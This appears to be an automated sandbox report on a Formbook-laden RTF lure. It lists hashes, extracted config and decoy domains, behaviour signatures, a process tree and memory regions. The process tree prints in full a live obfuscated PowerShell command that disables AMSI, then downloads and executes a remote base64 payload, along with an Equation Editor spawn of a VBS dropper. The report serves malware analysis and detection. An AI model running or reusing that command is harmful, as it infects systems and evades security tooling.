Analysis

  • max time kernel
    155s
  • max time network
    176s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    31-01-2022 07:25

General

  • Target

    RFQ_20220131.rtf

  • Size

    2.2MB

  • MD5

    1003a3560932316f965eceb34ec38488

  • SHA1

    ff874bf58b3d4e6563803c4c5353be46c937bb8d

  • SHA256

    a2f34d41dae7d24e7a1e6c67b720266f3562fa588f9425bfd9d97db75fa69dac

  • SHA512

    42b0b0577c285350487c0a0868de375914f1f5040ac3b02b689aaa060fa4a7aa010d4908aeee0671eaca46a03b97d0dbc34f10259ddf7d07dc5978b42b6c07ff

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

mz16

Decoy

isletme.xyz

o7agj7.xyz

no-fucks-given.com

khaomaneecat.com

meta-medical.store

cxtopy.link

abcsquaredancing.com

zonaserbaserbi.com

enfgames.com

drakestonecapitalgroup.com

einfachstadtreiniger.com

nftsmartlicense.com

2333.site

archate.com

floridacoastwellness.com

garciawam.com

2022sg.xyz

offertntdjj.xyz

lightunclyuchand71.xyz

friv.asia

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE FormBook CnC Checkin (GET)

    suricata: ET MALWARE FormBook CnC Checkin (GET)

  • Formbook Payload 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 29 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1448
    • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RFQ_20220131.rtf"
      2⤵
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1192
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        3⤵
          PID:1720
      • C:\Windows\SysWOW64\explorer.exe
        "C:\Windows\SysWOW64\explorer.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1796
        • C:\Windows\SysWOW64\cmd.exe
          /c del "C:\WINDOWS\syswow64\calc.exe"
          3⤵
            PID:672
      • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
        1⤵
        • Launches Equation Editor
        • Suspicious use of WriteProcessMemory
        PID:432
        • C:\Windows\SysWOW64\CmD.exe
          CmD.exe /C cscript %tmp%\Client.vbs A C
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:560
          • C:\Windows\SysWOW64\cscript.exe
            cscript C:\Users\Admin\AppData\Local\Temp\Client.vbs A C
            3⤵
              PID:1388
        • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
          Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$758886698585848839388847578584837828283747885=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,100,114,111,112,109,98,46,99,111,109,47,102,105,108,101,115,47,97,51,52,48,98,48,52,99,48,48,50,97,99,56,54,57,52,55,99,100,57,98,51,99,57,49,100,100,56,48,51,56,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($758886698585848839388847578584837828283747885)|I`E`X
          1⤵
          • Process spawned unexpected child process
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:972
          • C:\WINDOWS\syswow64\calc.exe
            "{Path}"
            2⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:1236

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Execution

        Exploitation for Client Execution

        1
        T1203

        Defense Evasion

        Modify Registry

        1
        T1112

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Client.vbs
          MD5

          6942f18721e02e8bdbbc059c323c1304

          SHA1

          ea35402005d5a33034c8069786904521a7a52dbc

          SHA256

          e0b44171e1e80b1f8789f6b2e5ed3602a440fca38f83b402324409d9cc21b276

          SHA512

          1d67366a7cb09a9556068b220bf3aa8183219fd97ab4731b5530e917420df24da411d0daeba00a935dfd88c3d69aab34557a8c8077e99a5b5f50c416ddb73405

        • memory/972-73-0x00000000026A4000-0x00000000026A5000-memory.dmp
          Filesize

          4KB

        • memory/972-69-0x00000000026A2000-0x00000000026A4000-memory.dmp
          Filesize

          8KB

        • memory/972-72-0x000000000269F000-0x00000000026A0000-memory.dmp
          Filesize

          4KB

        • memory/972-71-0x000000000269E000-0x000000000269F000-memory.dmp
          Filesize

          4KB

        • memory/972-62-0x000007FEFBD71000-0x000007FEFBD73000-memory.dmp
          Filesize

          8KB

        • memory/972-64-0x0000000002670000-0x0000000002672000-memory.dmp
          Filesize

          8KB

        • memory/972-65-0x0000000002672000-0x0000000002674000-memory.dmp
          Filesize

          8KB

        • memory/972-66-0x0000000002674000-0x0000000002677000-memory.dmp
          Filesize

          12KB

        • memory/972-63-0x000007FEF2DA0000-0x000007FEF38FD000-memory.dmp
          Filesize

          11.4MB

        • memory/972-67-0x000000000267B000-0x000000000269A000-memory.dmp
          Filesize

          124KB

        • memory/972-70-0x00000000026A1000-0x00000000026A2000-memory.dmp
          Filesize

          4KB

        • memory/1192-55-0x00000000726C1000-0x00000000726C4000-memory.dmp
          Filesize

          12KB

        • memory/1192-88-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

        • memory/1192-56-0x0000000070141000-0x0000000070143000-memory.dmp
          Filesize

          8KB

        • memory/1192-58-0x0000000075831000-0x0000000075833000-memory.dmp
          Filesize

          8KB

        • memory/1192-57-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

        • memory/1236-78-0x0000000000A80000-0x0000000000D83000-memory.dmp
          Filesize

          3.0MB

        • memory/1236-74-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB

        • memory/1236-75-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB

        • memory/1236-76-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB

        • memory/1236-79-0x00000000002D0000-0x00000000002E4000-memory.dmp
          Filesize

          80KB

        • memory/1448-80-0x00000000073B0000-0x0000000007531000-memory.dmp
          Filesize

          1.5MB

        • memory/1448-87-0x0000000004A50000-0x0000000004AF0000-memory.dmp
          Filesize

          640KB

        • memory/1796-83-0x0000000000170000-0x00000000003F1000-memory.dmp
          Filesize

          2.5MB

        • memory/1796-85-0x0000000002170000-0x0000000002473000-memory.dmp
          Filesize

          3.0MB

        • memory/1796-84-0x0000000000080000-0x00000000000AF000-memory.dmp
          Filesize

          188KB

        • memory/1796-82-0x000000006B0C1000-0x000000006B0C3000-memory.dmp
          Filesize

          8KB

        • memory/1796-86-0x0000000002480000-0x0000000002513000-memory.dmp
          Filesize

          588KB